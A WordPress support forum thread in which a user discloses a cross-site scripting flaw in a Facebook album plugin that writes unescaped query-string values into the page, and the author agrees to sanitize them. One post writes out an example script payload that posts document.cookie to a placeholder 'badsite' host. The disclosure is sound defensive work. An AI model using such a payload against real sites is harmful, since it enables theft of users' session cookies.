Security issue with query strings

  • Resolved AndyErnst

    (@andyernst)


    9 years, 9 months ago

    A security audit of my site turned up a vulnerability in this plugin. The plugin reads the query string from the url (for pagination) and seems to add it to the DOM without escaping or cleansing. Someone could use this to inject script tags onto the page and steal user data and cookies.

    We had to remove the plugin from our site but thought you should know about this issue.

    https://www.ads-software.com/plugins/srizon-facebook-album/

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author afzal_du

    (@afzal_du)

    Thanks for pointing it out.
    1. DB is safe since the url params are not used for db query
    2. I’m not sure how one user can inject script and steal other user’s data using url parameter, then again I’m not a hacker.
    However, It’s best to sanitize data and I’ll do that on the next version.

    Thread Starter AndyErnst

    (@andyernst)

    Yes, the DB is safe but a hacker could make a user click a link going to a page with a srizon album on it, and if that link has something like this in it <script>jQuery.post(badsite, document.cookie);</script> they could send the user’s cookies from that site to a different site.

    Plugin Author afzal_du

    (@afzal_du)

    Understood!

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Security issue with query strings’ is closed to new replies.